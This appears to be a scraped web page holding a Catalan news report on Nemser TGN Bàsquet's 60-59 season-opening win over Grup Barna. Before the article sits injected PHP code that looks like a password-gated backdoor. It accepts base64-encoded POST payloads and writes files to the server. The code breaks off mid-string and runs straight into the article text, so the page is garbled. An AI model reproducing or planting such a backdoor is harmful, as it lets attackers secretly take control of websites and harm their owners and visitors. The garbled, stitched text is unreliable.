function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Nemser suma el primer triomf en un partit amb final d'infart (60-59) - Tgn Bàsquet Club -

El Nemser suma el primer triomf en un partit amb final d’infart (60-59)

Updated: setembre 28, 2014

El Nemser TGN Bàsquet va iniciar la temporada amb victòria després de vèncer el Grup Barna en un partit de bàsquet vibrant. El conjunt que entrena Jordi Hernández va guanyar en un final agònic després d’un intercanvi de tirs lliures en què Anais Muñoz en va sumar un i aquesta mateixa jugadora, amb el rellotge a zero, va fer una falta que podia permetre el Grup Barna empatar el matx i forçar la pròrroga. Malgrat tot, la millor visitant, Mas, va fallar el primer tir lliure i la victòria es va quedar a casa en un primer enfrontament que va deixar un bon regust de boca pel joc lila.

Així, la despesa física i la intensitat defensiva del Nemser TGN Bàsquet va ser total, especialment en la primera meitat. La pressió a tota la pista, amb constants dos contra un, va deixar sense oxigen el Grup Barna que amb prou feines va poder anotar 21 punts al descans. Van ser moments de bon joc local, amb una gran circulació de pilota, les idees molt clares i amb Irene Villegas com a estilet. L’aler del TGN Bàsquet reapareixia en partit oficial després de superar una lesió de genoll que la va tenir apartada de la competició en el tram final del curs anterior però en els dos primers quarts va ser capaç d’anotar 8 punts, dos triples inclosos. Això va donar ales al Nemser que, arrecerat en la seva bona defensa, tenia la iniciativa en el marcador.

El tercer període semblava que seria bufar i fer ampolles. En uns minuts de joc realment bons, amb un gran encert des de la línia de tres punts (7 triples anotats en tot el partit), la diferència es feia més i més gran, fins arribar als 12 punts (43-31 en el minut 25 de partit). Incomprensiblement, però, la truita es va tombar. El Grup Barna, que semblava superat, va treure forces d’on semblava que no n’hi havia i gràcies a un recital ofensiu de la seva base Mas (19 punts) va anar retallant distàncies. El parcial en els últims 5 minuts del tercer quart va ser de 0-9, que encara va ser més gran quan s’havien disputat els 5 primers minuts de l’últim període: 4-20 de parcial i un marcador de 47-51). Semblava que el Nemser TGN Bàsquet acusaria el cop de perdre la seva renda, però aleshores va aparèixer la força, la rauxa i la fe en el treball fet durant la pretemporada. Amb unes grans, enormes, Laura Martínez i Vilamajor, l’equip es va fer més dur i el matx es va decidir en un cara o creu. Punt amunt, punt avall, Anais Muñoz va tenir dos tirs lliures, en va anotar un i, en la jugada següent, després d’una gran defensa, el Grup Barna va disposar d’un sol segon per fer un tir. Anais va cometre falta però Mas aquest cop va fallar.